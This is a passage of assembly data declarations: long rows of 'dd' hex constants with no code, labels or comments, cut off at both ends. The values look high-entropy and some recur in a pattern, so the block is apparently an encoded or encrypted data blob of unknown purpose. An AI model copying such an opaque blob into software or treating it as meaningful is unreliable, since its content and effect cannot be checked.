0B0D6A1F8h, 6953E708h, 31F1B4EDh dd 9CCCC3F5h, 1915A78Bh, 3C66032Ah, 79B5F1C5h, 0A4049C3Dh dd 59D5CA04h, 9FAFBC96h, 0C576312Dh, 86C50959h, 99D5A8C9h dd 0E1C9E05Dh, 0AD3571AFh, 0C90445D5h, 4980AE8Dh, 0A265E1A8h dd 1DF13C11h, 94580F9h, 0F155FB9Dh, 69A5E1D9h, 79E1A37Bh dd 0C5103E6Ah, 6A959138h, 0AD72ACD4h, 0E8F5316Ch, 0D8C76B2Ch dd 99BD1027h, 0BB65615Dh, 0CC69E452h, 4C9341FDh, 894E257Bh dd 2861C9C9h, 0C622B1EDh, 0B65A549h, 8CAA91CDh, 69E5D7F5h dd 0D757474h, 1991222Bh, 59FF0586h, 0FFB2704Fh, 8C39A492h dd 0C9C013Dh, 0CF05648Dh, 0DC19F4A2h, 0AEB871EDh, 0A35213F9h dd 4E9809C9h, 2965A099h, 53B58246h, 0A2B6D8EDh, 4905C19Dh dd 3BF5B18Dh, 4CD164D2h, 8D04C17Dh, 5995D305h, 0A1C155E2h dd 8FEDA492h, 7696013Dh, 0D9E309D8h, 0EDE73C5Dh, 0F30BF1ADh dd 424340C8h, 9900D500h, 0A47C429Dh, 7965B178h, 5F9482FDh dd 0D9D14332h, 68BA69D2h, 0FDBAF12Dh, 4985C02Dh, 2CAFEF8Dh dd 9765670Dh, 0B8713E6Dh, 9C5017Ch, 68A03173h, 0B91BE01Bh dd 8C723FE4h, 0FCACAFFh, 0F25A50CBh, 290FF053h, 0C626E7BCh dd 49739168h, 0D86EC8CDh, 697A64D2h, 0FC38F12Dh, 49C5DC9Fh dd 55FDD167h, 0F9E5211Dh, 0A960CE3Eh, 0B4C5414Bh, 99D51141h dd 0E99AE452h, 48DC71ADh, 480541BDh, 904701B3h, 8CE0AECBh dd 0BA75B1EDh, 35E9893Bh, 80D19EC0h, 55A5E1DDh, 0D546840Dh dd 0CC8AFB01h, 5995D181h, 89C52CB0h, 98C8114Dh, 0FCB1641Ah dd 0B9E9BD32h, 97A41D28h, 8D5D5152h, 487434C9h, 0E36552F3h dd 41108EB2h, 398AF62Bh, 19FFB0F2h, 0EE5591EAh, 0FC5AB33Fh dd 79F5C491h, 19D5010Eh, 507D815Dh, 0EDE5211Dh, 0D59B4602h dd 89A16012h, 0AFF584B2h, 29A0611Dh, 300647D9h, 0FF4FC434h dd 0B14451CDh, 0A965A39Dh, 6923E0BCh, 3F611402h, 8CD8918Dh dd 69E5FADEh, 2D7CC27Dh, 18D7916Ch, 35002E5Ch, 2EE56128h dd 2C0A1569h, 89853441h, 1455D2B5h, 0E965742Ah, 0AAF688ACh dd 9E5107F2h, 855003CCh, 5B06C8D0h, 5F1AC282h, 6012DD89h dd 6E3AF5A3h, 1CE6BDAEh, 17D0835Fh, 3BE09749h, 37FAB87Eh dd 0D99D6441h, 0DC875E01h, 0E891010Fh, 0EDB0763Fh, 9D560E15h dd 63573ADh, 0C9053E4Dh, 0B667218Ch, 708C8E5h, 5E16C384h dd 7124ED9Ch, 7525BFB4h, 2AECAFDDh, 1FD1D166h, 31FFA859h dd 0C9FA37Fh, 89B7644Eh, 
89C7011Bh, 0A9F43148h, 0B9FB3163h dd 0A66F4C67h, 0DF153FE4h, 0BD7728CBh, 31405BF8h, 2965A19Dh dd 8D9830B0h, 0CF45C1E0h, 5940E648h, 0FC5AE1DDh, 79F5C4B9h dd 3D9A29FCh, 0D28BBB31h, 0E9D071A8h, 8559686Dh, 0EFEF7453h dd 842A2FCCh, 54A84228h, 0F97547EDh, 9E073736h, 54B03728h dd 6956CB18h, 0A9F03EEDh, 0F345C1CEh, 95AFD744h, 0D85E1F93h dd 927A132Ch, 0F8004C7Eh, 9959118h, 0A78F2177h, 8C51A492h dd 0F546013Dh, 0ECD11969h, 0E9218976h, 0BF6671ADh, 5CFA41FEh dd 0D9556405h, 0D699E975h, 39725912h, 4F1681FDh, 4A1ACE8Eh dd 0E1301EDDh, 91B5B118h, 0B67A3D0Ch, 0A66687E5h, 0AA68DEE2h dd 51F5717Eh, 89C50176h, 0CB904218h, 0AD0B536Eh, 6353DE1h dd 8930DD28h, 0D91FB98Dh, 5A12A19Dh, 571CC39Dh, 904E789h dd 51C06E9Dh, 0E0A5A1E8h, 3980A5A8h, 0C4B4CE3Dh, 198D3180h dd 0EF60A81Dh, 0E8F5715Bh, 0BC599482h, 0F146110Dh, 0E9256159h dd 0E1D8C420h, 445C41FDh, 99237D30h, 0DFB3499Dh, 0FE134E12h dd 4958E678h, 9AA56ECDh, 29B88878h, 0EC38F12Dh, 49C5DC1Ah dd 58FF855Dh, 0C1B72177h, 39F5316Fh, 0BFF59482h, 5950110Dh dd 64071407h, 0B9282B20h, 0CF6F13BDh, 0C472E400h, 7F31A1DDh dd 6B24E1BDh, 3F711402h, 0E60D918Dh, 2993CD48h, 3430372Dh dd 49858105h, 5995DDE5h, 0E6B6761Dh, 8BC67A2Eh, 0C5894553h dd 540EE4Dh, 7A252168h, 0F93576C5h, 8DB0CCBDh, 80151195h dd 1C991C10h, 689DB1ADh, 0E1BA7E0Bh, 195591C1h, 20EBA88Ah dd 57E1B463h, 49C98D79h, 6C0944F2h, 6960215Dh, 0B812B562h dd 0E156017Dh, 99D51148h, 0F1A7D4D0h, 746C71EDh, 89335900h dd 2F0FB98Dh, 94E65E62h, 393587F1h, 0CBC18EFDh, 985591CCh dd 69A47131h, 78DDA52Dh, 0B685C13Ch, 19A02D98h, 3921A01Dh dd 0E9F5316Ch, 89AFD5F6h, 8540EE1Fh, 6C25216Bh, 0F440286Dh dd 0C916C9D5h, 6580AE8Dh, 0C265E1A8h, 50C8320Fh, 945C1E0h dd 9CD8B8B8h, 69E5FCB0h, 71200E7Dh, 0CC85810Bh, 6211DECDh dd 22E5211Ch, 0B97E3D2Dh, 0C4A3182h, 99950C24h, 0D168E49Bh dd 933471EDh, 0A3042BBDh, 0CD80AE8Fh, 0AA65E1ABh, 0BD7A4E15h dd 94580EFh, 7CC01C5Eh dd 3A5A1C0h, 86E6A33Dh, 9B3C5A8h, 5655540Dh, 0A9E5D398h dd 3F48BC6Dh, 38C54160h, 6369F945h, 7D4D9EA2h, 0A73571ADh dd 0FD8CA796h, 4CEA05A9h, 29259405h, 24E10C60h, 8F481BDh dd 
0E6AF0C25h, 4DE16A22h, 7155303Dh, 4DA18536h, 529D31CCh dd 0F9ED0559h, 0B9F53485h, 0BFEB247Dh, 66821135h, 0A91035C8h dd 0F5F1F2ADh, 0E903067Bh, 0C494C400h, 290FA1DDh, 39759085h dd 0F616D3FDh, 59638158h, 4DD96CDDh, 0EC4AA639h, 49C5F465h dd 53ADD5CBh, 0F9E54B5Dh, 2C0A623Ah, 8985376Dh, 2458F74Eh dd 0E9657CFFh, 0F55D71C7h, 9E0541BDh, 0C980AEDEh, 1465E1ABh dd 3975B1E1h, 0BCC8CC88h, 1915A783h, 51E86C50h, 0B79EF16Dh dd 1FD4C157h, 55002E5Eh, 2AE5612Bh, 968B3195h, 43B8AECh dd 0D9E35FF8h, 1B28D15Dh, 99250403h, 36FFB955h, 0CE673072h dd 5EE8A87Eh, 0B29F5AECh, 848BAA32h, 5963DF70h, 0EE0112DDh dd 2A0C1ADAh, 7F8554C2h, 0E415D14Dh, 0A9A5346Ah, 0D1DF456Ch dd 89C5744Dh, 0AC6984B2h, 54A5611Dh, 0F97549E0h, 0E1435BDh dd 99083808h, 2965A19Dh, 74F077EDh, 945C1C5h, 0E6ABC724h dd 0E9202622h, 79B5B138h, 1405C13Dh, 5495D5CFh, 0C7C56E17h dd 999B5E02h, 0E5E56712h, 0B8B07724h, 9D052E7Dh, 0D9501CC4h dd 0AA252EC9h, 0BB703DE8h, 4C11C0EFh, 197FBCCCh, 2965A1DDh dd 6C26B182h, 1BC08CB0h, 0BD4960Dh, 68EBA459h, 3CC7DB00h dd 0DD8B4471h, 0CA865401h, 0E1E57811h, 0E0A5612Ch, 8D4B007Dh dd 894D148Dh, 0A87122D8h, 0F93925E3h, 4704D5EEh, 5E1BD889h dd 468A1C7h, 6D34C6C7h, 7CC89BEh, 15D4D14Ah, 28E1E151h dd 37F4F174h, 0C08B0179h, 9581590Ah, 0FBAA675Dh, 0F0A7776Dh dd 9A410F38h, 8E15388Dh, 0F37128DCh, 0B1425B80h, 900D3F8h dd 1910C38Ch, 2530EE84h, 7027F7EDh, 1AC18FB8h, 16F6D112h dd 69A4A450h, 30B5A544h, 0C091016Eh, 99D45400h, 0FAE27534h dd 0EDB47D6Dh, 0E3284038h, 0C9F2F5A9h, 0F3AE18EAh, 96C12860h dd 39C3B5B4h, 1EC44B08h, 0C4EFB49h, 5962C385h, 0CC5F3BFEh dd 6913E53Eh, 29EB3857h, 3B0C7C4Ah, 0B396E063h, 7B99FD31h dd 517DB22Fh, 99D5114Dh, 0E925615Dh, 0F93571ADh, 0C90541BDh dd 0D915518Dh, 2965A19Dh, 3975B1EDh, 94581FDh, 195591CDh dd 69A5E1DDh, 79B5F12Dh, 4985C13Dh, 5995D10Dh, 0A9E5211Dh dd 0B9F5316Dh, 89C5017Dh, 99D5114Dh, 0E925615Dh, 5F90F2CDh dd 0C9050184h, 0E0BFF40Eh, 2665A1DDh, 0B461F25Ah, 0BE4A99AEh dd 0C9569786h, 4D81A556h, 0BB9B306h, 41C7FA24h, 1B1EC57Eh dd 0A5A70A09h, 8053A4E4h, 0C4C013Dh, 999528E7h, 2BA664B6h dd 
98EC9385h, 4105457Fh, 9937A608h, 2901499Dh, 261DB1EDh dd 844581FDh, 5977B548h, 719CB8DDh, 0B936FD59h, 0B6722339h dd 19AC5F88h, 7012E21Dh, 9B02BC6Eh, 9926013Dh, 162961B2h dd 0EDCDE25Dh, 64BC874Fh, 0C9456399h, 0AD156B0Eh, 2A578A98h dd 77F8A19Fh, 571ED901h, 6D55AB4Eh, 82971ED9h, 69C70E2Eh dd 0B67A96D5h, 725BFAF2h, 0E9DC8B90h, 0F2F6696Dh, 0C4AC249h dd 999528DFh, 0D0ABE49Ah, 0F93571EDh, 0F5ED41BDh, 5215518Dh dd 695C2F18h, 0CE0059EDh, 11AD7E02h, 9A5591CDh, 299C6F60h dd 71C0F12Dh, 6B255CB4h, 0C57ED14Dh, 906BACE2h, 3636312Dh dd 0C9FC93F8h, 1740984Dh, 1252164h, 0F93571AEh, 42C6888Eh dd 0D915D11Eh, 0C48DF39Dh, 3A8A4E13h, 497C2B68h, 9A8392CDh dd 66A5EDA7h, 79B4F6A9h, 59FF423Dh, 0A411DE0Dh, 22E5211Dh dd 51A53D2Fh, 763AFFB5h, 0A07F944Eh, 2F26611Dh, 793DFBFDh dd 0D0714144h, 0AD3BA80Dh, 0D88EE19Eh, 0B874F966h, 0D69A5E1Ch dd 5DAC1012h, 1CA5AD91h, 0B19EA8C1h, 467F38BEh, 59956682h dd 0D164471Dh, 0B6C70293h, 89C5AAF8h, 0A356474Dh, 6220145Dh dd 0FBDE61E7h, 38064B36h, 2767B9DCh, 9C665E62h, 39358847h dd 71850450h, 9DD19E36h, 96A5E1DDh, 398C5B98h, 1C6D913Dh dd 5A6A2EF3h, 0E9DC8B98h, 1370BE6Dh, 8AC54144h, 1A863549h dd 3216639Dh, 1A3DC7A2h, 0E9CCC1AFh, 0FD3190DEh, 0D798899h dd 6251BDC4h, 88AC6ABDh, 0A2829E36h, 0E89B9500h, 17F059D6h dd 0C8B3B5E6h, 0F8AE88F6h, 28CB55E2h, 0CD7E796h, 8E375D1h dd 0C13C82B6h, 683B15AEh, 0A1DC0C56h, 4813354Eh, 0FC2A1776h dd 0A86BD57Ch, 1C4A8116h, 0F643F51Ch, 596C0358h, 184CBADDh dd 274A0ED2h, 0A09103BEh, 0A66A2FE2h, 0AD8F22DEh, 4FE0D935h dd 1C4DFE82h, 9995359Ch, 0F114D93Bh, 1DF593AFh, 0AFE743BEh dd 81133B26h, 0D6905B75h, 31B73212h, 0C2F507Ah, 0ECB87995h dd 93251E22h, 0C9BE822Eh, 9800C36Dh, 0F3959129h, 0C18F06F6h dd 43759B35h, 39DD747Eh, 6C18F95Ch, 0E89D9EA2h, 7D3571ADh dd 1808356Fh, 32DFAF6Dh, 91604A6Bh, 0B975B1EDh, 0CAFA6356h dd 2D692C40h, 0EC52E19Dh, 79F5C51Ch, 0C985C13Dh, 3925D279h dd 9860D6B7h, 0BAF57159h, 86C4017Dh, 99D5E7C9h, 6270D95Dh dd 529E9941h, 0F093FC34h, 31A551CDh, 0AC920A37h, 393585DCh dd 84581FDh, 20CF2C44h, 22D1E19Dh, 4D8474DAh, 4985C17Dh dd 
3E2DD30Dh, 0DCD3DE79h, 0DD928968h, 0EF6E2FF6h, 0FFD511F5h dd 592615F6h, 7CC2DBF0h, 0C945758Ch, 0D115518Dh, 21082C25h dd 0CE63C4EDh, 4971B078h, 195591CDh, 0AC2659D9h, 7CC1F125h dd 0B1684285h, 0AEDA7A0Dh, 0E9D11098h, 0B9F5326Dh, 39C1757Dh dd 127EBBA4h, 0A91CF7D8h, 0D2FAFAADh, 354DC875h, 0ED24D47Ah dd 2966A1DDh, 6601B1EDh, 0F621E645h, 87E818FBh, 0C2A5A1E4h dd 1EB5F195h, 0C03D6A59h, 0F295D12Bh, 561B9CF5h, 51D58192h dd 763AFDB2h, 21B328AEh, 424374A2h, 6CBEDA3Ch, 0C945758Ch dd 1BE2837Ah, 2965A19Eh, 0AE9DA598h, 0B9BA7E03h, 0E5FC79D2h dd 0D1C31E22h, 0D2D3E4D2h, 860E6AACh, 600B5486h, 61CE215Dh dd 4E0979E4h, 0C9F130F8h, 99D5154Dh, 5137155Dh, 31CBB184h dd 90DF916h, 61BE55F9h, 4E8E59E8h, 8F04646h, 145C1C9h dd 6C5591CDh, 46186197h, 79B5B119h, 603D8049h, 535CF815h dd 0E9D10AB8h, 0BA11F16Dh, 0BDEEA477h, 297E110Dh, 6CAFCBECh dd 0F9754582h, 0C345F117h, 99217A08h, 91030B9Dh, 0BC824C0Fh dd 905B5CCh, 195591DDh, 2015E6A9h, 0C0D9787h, 0F92EA7C1h dd 99A67BE5h, 2B58A8B6h, 4EF57154h, 0C9F130F8h, 99D5314Dh dd 592C145Dh, 0D0B07BF5h, 63050189h, 1994E9EBh, 1D54246Ah dd 3935B1ADh, 0A3181FDh, 137D554Dh, 2991C878h, 0F01E972Dh dd 9BC4780h, 0DC627A0Dh, 0A9A5152Ch, 0F9F5316Dh, 0D9750808h dd 0ADFC944Fh, 1E8F611Dh, 0B9014028h, 0C905C1BDh, 691E248Dh dd 3E0AB25h, 9375F1D9h, 0B123BC16h, 9CA289FCh, 69E5D5ECh dd 79B5F02Dh, 6035C349h, 6DBF7407h, 4D25215Dh, 93503B6Eh dd 0EFC54149h, 186D77E6h, 0D8A096ADh, 0F9353199h, 0BC0541BFh dd 0D3DDE58Fh, 69518B38h, 0B0DED7EDh, 497C2340h, 3D6929CDh dd 9E0EE1DDh, 3981C0A8h, 4985C93Dh, 0AEF9A50Dh, 0E9D11098h dd 0B9F1316Dh, 39CE747Dh, 0B2501BF5h, 43252169h, 7CC23C46h dd 0C945758Ch, 0D915598Dh, 9103B0E8h, 9C7F516Eh, 905B5D6h dd 0D9663AABh, 0FB00A77h, 73ADD895h, 9B1EA98h, 5A71110Dh dd 9DCE8417h, 1293312Dh, 0BDF4848Ah, 89D5110Dh, 5143615Dh dd 0FA41B12Ch, 0C30D853Dh, 99217A28h, 26CEC79Dh, 0D5A345Bh dd 0FEEE81BDh, 5961A048h dd 69A5E1DDh, 0C9BC856Dh, 6000C36Dh, 0F3959139h, 9DD4A4EAh dd 99F5312Dh, 0F75017Dh, 9DD11338h, 63DB2ED0h, 0B9015808h dd 4388C8BDh, 0BF1511B4h, 2C992136h, 
39C5B698h, 49BACE7Dh dd 28D06667h, 69A5A1E9h, 1FB5F16Dh, 3CB4A785h, 3FBC650Fh dd 0A3FD91B6h, 0F9C11AE8h, 8A25C17Dh, 6E5DA1E7h, 0A91150D8h dd 0F9B571ADh, 790734BDh, 0F0B0DB0Bh, 4F65E1A9h, 3C893146h dd 9F58688h, 59AADE4Dh, 58201677h, 79B5B119h, 3C85C03Dh dd 53D56106h, 0E9D10898h, 0B61E9B6Dh, 4946B91Bh, 0ADFCB447h dd 4243611Dh, 0E9F701Dh, 89317038h, 0DB15518Dh, 0DE4AD49Dh dd 79418068h, 0D4581FDh, 0A94FE4CDh, 4220EB1Dh, 0F3B5B119h dd 9B1F198h, 4975100Dh, 2883997Bh, 52F581C6h, 8385B175h dd 0D9E13AC8h, 6CD2CB5Dh, 0F975459Ch, 0C90D41BDh, 617341F8h dd 8C6F491Eh, 393585C7h, 8F52A9Bh, 51E59926h, 5D8F64D7h dd 8E1FF16Dh, 9B1F0B8h, 4995D10Dh, 0DC90901Dh, 3A4D5748h dd 0A3600B85h, 0FFD55179h, 43E552F6h, 0C0BFCC84h, 4CF241FDh dd 0D95565BCh, 2945A19Dh, 4EC4AE98h, 0B1239A16h, 0BC5F89C4h dd 69E5D5F7h, 73B615EDh, 9B1EB98h, 703EB70Dh, 0E9DCABA0h dd 3334BB6Dh, 0C9FC8BD8h, 297E774Dh, 0C0A06305h, 53353199h dd 0FD34C44Ah, 0D91651CDh, 0AD6AA09Dh, 3975B16Ah, 8221E645h dd 28D81AEBh, 0E8A5A1E9h, 79B5F1DCh, 4944363Fh, 2C96D10Dh dd 0CD829918h, 15E1FEAh, 89C5017Dh, 9FA0BA2Bh, 0CAED93Bh dd 9D8DDACBh, 6203CEDAh, 727391BEh, 1D54246Ah, 3975B1ADh dd 493080FDh, 2D64143Ah, 69A5E19Dh, 5FC1F92Dh, 2508795Bh dd 6DA454FAh, 0A9E5215Dh, 2CFA336Dh, 0EF240BBCh, 0EC1C95E6h dd 0CD9D0755h, 129E17A9h, 630DF1AEh, 61735F66h, 0AC67FCC5h dd 393585C6h, 0AAE2A9Bh, 0EEFF587Dh, 2991D058h, 79B5F12Dh dd 0F9A5B5BDh, 7010FB0Ah, 68E56129h, 30F82B8Dh, 8BC52575h dd 0D9E138E8h, 0EAC1A15Dh, 5231B52Dh, 0AFAF200Dh, 0D3F5AE35h dd 69518838h, 0CEDED7EDh, 4971B078h, 1955B1CDh, 9EF695DDh dd 3981C0A8h, 4985C13Dh, 0AE98A52Dh, 0A9E522DAh, 9F0456Dh dd 7A2EABEDh, 145ED6C6h, 0E96558DFh, 0B8BCB086h, 0C35DF141h dd 99217808h, 0AC920B9Dh, 393585DCh, 90581FDh, 0A1339DB9h dd 0ECAF228Dh, 79F5C504h, 0F1E3CBD6h, 0FC9F31F2h, 0A9A51534h dd 3C029A0Bh, 8985354Ch, 98D5114Eh, 6CD21229h, 0F975459Ch dd 0E90541BDh, 1EE25CF9h, 2965A19Eh, 0A9C5B499h, 82B66A57h dd 83D01A02h, 42A5A1E4h, 85FD78E5h, 0CC72080Eh, 59D5E53Ch dd 0A965211Dh, 3C783F18h, 89853554h, 199519C7h, 
115662A4h dd 0BDF87520h, 8055199h, 52A5596Dh, 4F634236h, 5FB58055h dd 86FDE756h, 19EDF94Dh, 88A7E1DDh, 0D2ED5A4Bh, 4FF008B8h dd 99A4696Bh, 6A558A7Bh, 8570BCC7h, 7EC54149h, 0D9E120C8h dd 0E925615Dh, 0AE3304BDh, 225DB996h, 0F146DA94h, 0F94E59B6h dd 0D73C66h, 9C4481BDh, 1915A84Fh, 2D2ED8DCh, 0C43CF509h dd 49C5D150h, 60136C86h, 2CCE215Dh, 0B9B508EFh, 0BDF4848Ah dd 9995110Dh, 0EB51615Dh, 3B9EA95Ah, 9E5341B9h, 0E0BBEC0Eh dd 2665A1DDh, 39746869h, 94869FDh, 5C1E91CDh, 25E0AF8Fh dd 3D9BC31Eh, 0B6858D71h, 19A05998h, 1760A81Dh, 0EAF57154h dd 8AF959F6h, 0B1A6EE95h, 11122D6h, 6CA8751h, 0F0A3D436h dd 0DA4E51CDh, 0ACECADDFh, 3935882Fh, 804DC3FEh, 596C5748h dd 41D66ADDh, 793542D2h, 9C6DC13Dh, 0D26A2EFBh, 0E9DC87A0h dd 701D676Dh, 23AFE8Bh, 0D9ECB7D8h, 0E16FEA5Dh, 0D2393BAEh dd 0CCECC273h, 0D875D982h, 0AD6AA19Dh, 3975B0B7h, 30EF34FEh dd 0AC56918Dh, 69E5D8AFh, 765DCD81h, 498563B8h, 5DD35C0Dh dd 9097A436h, 0BFF6312Dh, 7F43E92Dh, 2456EEB2h, 0E96558FBh dd 0C23E04ADh, 4A0A4DFAh, 0D9155096h, 0BC5CAD76h, 3935884Bh dd 84804F2h, 9C5691CDh, 69E5D8AFh, 868D704Bh, 0B500CE18h dd 0D295D10Dh, 0EACE235Dh, 0F01D6159h, 0B03AFE8Bh, 0D9ECB7F0h dd 0DA06E5Dh, 0FA3571ADh, 893CEB38h, 0AB90528Dh, 0A265E1A4h dd 35329AEDh, 98803F2h, 5E6E91CDh, 0AD26EED5h, 0FAB5F12Dh dd 0E86C3FDh, 2B10D219h, 0FBE56124h, 740CE3Dh, 76C54144h dd 0D9E059D8h, 29A03B5Dh, 0F982F4A2h, 55EC41BDh, 0E515518Dh dd 0BDE0AE62h, 0B975B1EDh, 8C4A94C3h, 19559146h, 42A4A756h dd 91E5C56Eh, 0B67A34E5h, 60336C34h, 0DE90215Dh, 805FB46Eh dd 0CC6013Dh, 9995283Fh, 0D0EFE4D4h, 0F9BE71EDh, 0F0C7C486h dd 0D16751CDh, 10A324A6h, 5007B1ADh, 94581C0h, 0F162E3BDh dd 69A5E1C2h, 0F249BFA0h, 4A87EAFCh, 0DCAEC14Fh, 0A9A518D7h dd 7D763D18h, 6F4FE6Dh, 0F8C93509h, 66E67AB6h, 0B90CE328h dd 7C8E21BDh, 0D95568FFh, 0D693D775h, 39DCD012h, 7CC581FDh dd 1512BAC3h, 2E9EE8AFh, 4537FE25h, 7A3EC2h, 0A7275402h dd 956EDEE2h, 8852B049h, 76C50159h, 72AAEEB2h, 0CD6FE061h dd 193571CDh, 42C572F3h, 5C927581h, 29259833h, 1D400860h dd 8C4681FDh, 1915A8BFh, 270044BBh, 3BB63706h, 45C7EA29h 
dd 0B16E97CBh, 0A9B7A0DAh, 0B9F0316Dh, 0CF4C017Dh, 5A8B4EB1h dd 0D16BD4D0h, 66371EDh, 89303D28h, 26EDD28Dh, 29DE2592h dd 0BCFCB1EDh, 905B8AFh, 0E60391A7h, 29905548h, 7675742Dh dd 498565B9h, 955FA0Dh, 0F9E64B4Dh, 0B99D3007h, 0DF05017Dh dd 0AC8984B2h, 11A6611Dh, 0C7B17E52h, 400541B8h, 992C0708h dd 73E82C9Dh, 0B475F1D4h, 497CE368h, 7307C0CDh, 0FC5AB1DDh dd 79F5C4A9h, 467A39BEh, 5990DD89h, 56E54B1Dh, 0F9CC67D8h dd 950FE7Dh, 1AD55178h, 6D2A9EA5h, 0F9357558h, 0F06FC434h dd 102651CDh, 7934629Eh, 6871DBBCh, 30133402h, 8CAA918Dh dd 69E5D4BDh, 0FDBA31A8h, 4985C5ECh, 0DC1C183Eh, 0A9A51873h dd 0D1A4603Ch, 89CA0162h, 3940EE1Dh, 6C252168h, 73B17E6Dh dd 400541B9h, 992C2308h, 0E4DD629Dh, 0B275B184h, 8CB2B9B6h dd 1915A5FCh, 79A5E1DDh, 0FCB6F758h, 49C5D150h, 9896033Eh dd 4812D0EAh, 808FB4E4h, 0B27D013Dh, 12D51169h, 6C265D16h dd 0F97561C0h, 806938Eh, 38E2A07Ah, 10132414h, 36B6B1ADh dd 0F043CA4Ah, 4AD8A42Eh, 2A12EEC5h, 3065F239h, 4AAD0056h dd 6AF50DDh, 508B486Ah, 0C3762C19h, 69B70071h, 12E95AC6h dd 0AB26751Fh, 0B171FCBDh, 0EADCB642h, 0B3906A4Ch, 0EA65E1A4h dd 2951E566h, 8BCA41CEh, 19559175h, 826A6A1Eh, 37087C26h dd 0B5858105h, 90A60E86h, 0DB841DB1h, 0CE8F0D6Bh, 23E52D7Fh dd 75A14D71h, 34514F61h, 11407191h, 0C88E885Eh, 9C4D14B0h dd 146ED59Dh, 3927F2BEh, 0F67604F2h, 1ADE6E32h, 27ECB6E0h dd 5F31FE6Eh, 747A3EC2h, 17C0925Ah, 56FEA512h, 0EEC8CE92h dd 86F7323Eh, 662A01C9h, 0BA755CA2h, 7D3A3EF9h, 36FABEB8h dd 0F4FD8ABEh, 269A5E63h, 0C68B4969h, 0E197B202h, 195591DBh dd 965A8E35h, 79B519D2h, 0C8D8C13Dh, 19BA5BE0h, 0AAD8C81Dh dd 4691316Dh, 0FB708A4Fh, 0FDD55174h, 684343D4h, 0F66F3C93h dd 0C9066738h, 0E54BDA8Dh, 0A8037F9Eh, 3630E1D6h, 9469778h dd 0F1666CDh, 69A5C1DDh, 7ABC7422h, 0A73C13Dh, 171ED351h dd 55612E3Dh, 5AF5316Fh, 883C8071h, 96D5114Ch, 0E9278FDBh dd 7F899ADh, 4B0ABE42h, 0D915536Eh, 2A75EB16h, 39CDBDA7h dd 584580FDh, 0E6BF7F25h dd 4630D122h, 0C8B5B119h, 7930F11Dh, 33959139h, 0F12CDF3Dh dd 6D1D2515h, 0C3AFE97h, 5B411E9Fh, 7C14838Eh, 0F975459Ch dd 0CF6DA456h, 8015518Dh, 2965A7F5h, 
8D9DE9EDh, 83BA7E17h dd 5961B848h, 432167DDh, 79F5C504h, 7DAC44B5h, 0B977D14Dh dd 9DD4A4EAh, 0B9FD312Dh, 80B0017Dh, 0ADFEACCDh, 9D24611Dh dd 0C8B08668h, 0CA050189h, 0AD14518Dh, 0D82186h, 3C75F1D9h dd 0B4C53189h, 1915A5E7h, 0E90295D8h, 3981DA90h, 0D7F1C43Dh dd 6DA454FAh, 0A9E5215Dh, 0B081B16Dh, 0BDECBCFDh, 0EED7110Dh dd 4780E2D4h, 0F9353194h, 36F1CE55h, 24D5B972h, 0C8D5E62h dd 0B275B1EFh, 497CF760h, 0E58B79CDh, 0EDAA1E22h, 79B5F326h dd 70F774B6h, 71ED14Dh, 413B2221h, 460ACCB2h, 88308372h dd 0D354114Dh, 0E9250179h, 0ABCBFA4Dh, 0DD7F42EBh, 2E052B8Eh dd 69519018h, 3975B1EDh, 844BF4EDh, 5961AD78h, 4286ADDh dd 8AB5B13Dh, 463C9699h, 0D495D104h, 0E9F521A8h, 850C26Dh dd 7AC7E27Dh, 0A850E6E9h, 0E9252169h, 0F62571ADh, 0C905E939h dd 0F166AE8Dh, 0D694CE75h, 9FE03A12h, 8C45C1C4h, 8BD19E1Fh dd 0E2A5E1DDh, 398C8398h, 59CF4A3Dh, 39B19B8Ch, 8205211Dh dd 0BB863927h, 0FBC6C84Eh, 0F4582A59h, 6225214Dh, 0B9251C20h dd 425333BDh, 7C9675B1h, 2925B1F0h, 54D232EDh, 94581FDh dd 185DEB46h, 9EA6E997h, 0FC3E06AAh, 49C5F8BBh, 6DA454FAh dd 0A9A5215Dh, 0BB81316Dh, 0FBC6198Ah, 10E53841h, 0A91CCFE8h dd 0D146FAADh, 4CF271BCh, 0D95565BCh, 2965A1DDh, 2182B399h dd 0F5F169ACh, 0F20C6E32h, 41D6E2D1h, 28B98306h, 1621326Bh dd 65205C54h, 5AE56129h, 0B6AB6EC9h, 0E48934Ch, 99D5109Fh dd 0DD0AF467h, 0FF4071EDh, 9F7D93D4h, 899D43B9h, 0F6A94962h dd 0B22F4E12h, 43468DB7h, 28D066DDh, 69A5A1E9h, 0F4A5F12Dh dd 5AF0C77Ch, 603B5C84h, 2CE6215Dh, 0B9B52100h, 89A8A6FEh dd 0B2D5114Dh, 5CDA491Eh, 0F97548D3h, 0C957C634h, 9F9A518Dh dd 18E056BDh, 3975F1D9h, 7DC581FDh, 3EBDC3CAh, 335A1E24h dd 401B7CA6h, 4A66C17Dh, 0D2BD9A84h, 2C6E3157h, 0B9B5081Bh dd 0FACD4B44h, 919F984Eh, 6A35235Ch, 723529CEh, 893C3B38h dd 0FD29398Dh, 6B64A19Dh, 7A74E8E5h, 26D00BADh, 0EE55D1F9h dd 2991D058h, 79B5F12Dh, 4A83B52Dh, 1985BC80h, 5EE5971Dh dd 0F9C100E8h, 8BC5017Dh, 67C1644Dh, 0D8A0969Bh, 0F9353199h dd 0BC0545BDh, 0E9A0DB8Bh, 0DE65E1A9h, 79418068h, 90581FDh dd 935EE4CDh, 0C367E3DAh, 8E57272Fh, 4E0FC8D6h, 5B3F133Fh dd 9A12C3CBh, 9B7E55BFh, 0D1C78E19h, 
0A083ACCEh, 0E625611Dh
                dd 6CEF929h, 0BBB0BE42h, 261511B4h, 69506508h, 57C04EEDh
                dd 0F645C1C4h, 5960AD58h, 33286CDDh, 0F4B5B114h, 9BCA3A8h
                dd 33C7800Dh, 0FF50DE1Dh, 46F57154h, 0C9F0B9E8h, 0CF60EE4Dh
                dd 16252164h, 0B9004D38h, 87B0CCBDh, 261511B5h, 695CF328h
                dd 0AC8AE7EDh, 905B449h, 2003344Eh, 0AAA5E19Dh, 79B5F1C5h
                dd 48EF9C3Dh, 6ADC3C8Ch, 59BD215Dh, 3970F062h, 0CC54168h
                dd 5156D28Dh, 282A91A2h, 0B920F128h, 0D93882BDh, 0AC157B8Dh
                dd 55E4C781h, 4819BDC9h, 0E1259288h, 0E6AA6E09h, 174DE4A8h
                dd 914A0ED6h, 0B67A3EEFh, 746AFF6Ch, 0BBD17765h, 0B9F514D5h
                dd 2C2D617Dh, 0EC2AEEB2h, 0CD61EA64h, 0B780FC9Dh, 42050185h
                dd 587359DDh, 5A67A7A7h, 391DE7C8h, 82457EFDh, 4B55FB09h
                dd 91301E8Dh, 0FAB5B118h, 7704C9F9h, 5AAEE51h, 6F662268h
